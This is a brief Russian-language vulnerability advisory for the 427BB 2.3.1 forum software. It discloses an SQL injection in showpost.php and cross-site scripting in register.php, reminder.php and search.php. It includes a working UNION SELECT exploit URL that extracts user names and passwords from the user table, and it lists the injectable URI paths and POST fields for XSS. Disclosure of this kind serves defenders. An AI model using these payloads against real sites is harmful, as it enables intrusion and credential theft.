Программа: 427BB 2.3.1

Найденные уязвимости позволяют удаленному злоумышленнику осуществить XSS
атаку и выполнить произвольные SQL команды в базе данных приложения.

1) Уязвимость возникает из-за ошибки в проверке входных данных сценарием
showpost.php. Удаленный пользователь может с помощью специально сформированного
запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://[target]/[path]/showpost.php?ForumID=1&post=1 union select
1,UserName,3,4,5,Password,7 FROM 427bb_personal WHERE ID=1—

2) Уязвимость возникает из-за ошибки в проверке входных данных сценариями
register.php, reminder.php и search.php. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

XSS в URI:

http://[target]/[path]/register.php/<XSS>
http://[target]/[path]/reminder.php/<XSS>
http://[target]/[path]/search.php/<XSS>

XSS с использованием POST метода:

http://[target]/[path]/register.php
[-]POST переменная "uname"
[-]POST переменная "email"
[-]POST переменная "email2"

http://[target]/[path]/reminder.php
[-]POST переменная "email"

http://[target]/[path]/search.php
[-]POST переменная "keywords"



Оставить мнение